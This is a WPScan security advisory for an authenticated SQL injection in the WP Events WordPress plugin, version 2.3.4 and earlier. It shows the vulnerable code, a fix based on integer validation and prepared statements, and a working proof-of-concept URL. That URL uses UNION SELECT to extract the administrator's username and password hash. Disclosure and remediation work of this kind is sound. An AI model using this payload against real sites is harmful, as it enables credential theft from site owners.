Events <= 2.3.4 - Authenticated SQL Injection


Description
Required user access: administrator.
$_GET['edit_event'] is passed through esc_attr(), which only HTML-encodes the value, and is then interpolated unescaped into a SQL query.

File / Code:

Path Request: /wp-content/plugins/wp-events/wp-events.php

Lines: 450 - 468

// esc_attr() neutralises HTML attribute characters (quotes, angle brackets, ampersands),
// not SQL syntax, so a value such as "2 UNION SELECT ..." survives unchanged.
if ( isset( $_GET['edit_event'] ) ) {
   $event_edit_id = esc_attr( $_GET['edit_event'] );
}

...
// The value is interpolated directly into the query with no integer cast and no $wpdb->prepare().
$edit_event = $wpdb->get_row( "SELECT * FROM `{$wpdb->prefix}events` WHERE `id` = {$event_edit_id}" );

Proof of Concept
target.dev/wp-admin/admin.php?page=wp-events-edit&edit_event=2+UNION+SELECT+1,CONCAT(user_login,char(58),user_pass),3,4,5,6,7,8,9,10,11,12,13,14+FROM+wp_users+WHERE+ID=1
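An added example, not the plugin's code, showing why esc_attr() does not block the injection on this page and how the event id should be validated before it reaches SQL. esc_attr_like() is a stand-in for WordPress esc_attr() (assumed to be htmlspecialchars with ENT_QUOTES), and the input string is constructed for the demonstration.

```php
<?php
// Stand-in for WordPress esc_attr(): HTML-encodes quotes, angle brackets and
// ampersands only. A payload built from SQL keywords and commas contains none
// of these, so it passes through untouched.
function esc_attr_like( string $s ): string {
    return htmlspecialchars( $s, ENT_QUOTES, 'UTF-8' );
}

// Constructed input shaped like the page's proof of concept (no real data).
$untrusted = '2 UNION SELECT 1,2,3';

// Vulnerable pattern from the page: esc_attr() then string interpolation.
$vuln_sql = "SELECT * FROM `wp_events` WHERE `id` = " . esc_attr_like( $untrusted );
// $vuln_sql still contains "UNION SELECT": esc_attr() changed nothing.

// Hardened pattern: the id is a positive integer, so validate it as one and
// reject anything else before building a query.
function event_id_from_request( $raw ): ?int {
    // ctype_digit rejects signs, whitespace and any SQL fragment outright.
    if ( ! is_string( $raw ) || ! ctype_digit( $raw ) ) {
        return null;
    }
    return (int) $raw;
}

$id = event_id_from_request( $untrusted ); // null: request is rejected, no query runs
$ok = event_id_from_request( '2' );        // 2

// Inside the plugin the lookup would then be bound with $wpdb->prepare():
//   $wpdb->get_row( $wpdb->prepare(
//       "SELECT * FROM `{$wpdb->prefix}events` WHERE `id` = %d", $id ) );
// %d forces an integer, so even an unvalidated "2 UNION ..." would become 2.
```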

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2017/11/03/wp-events-2-3-4-wordpress-plugin-sql-injetcion/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Verified No
WPVDB ID 8954

Timeline

Publicly Published 2017-11-03 (17 days ago)
Added 2017-11-12 (7 days ago)
Last Updated 2017-11-12 (7 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.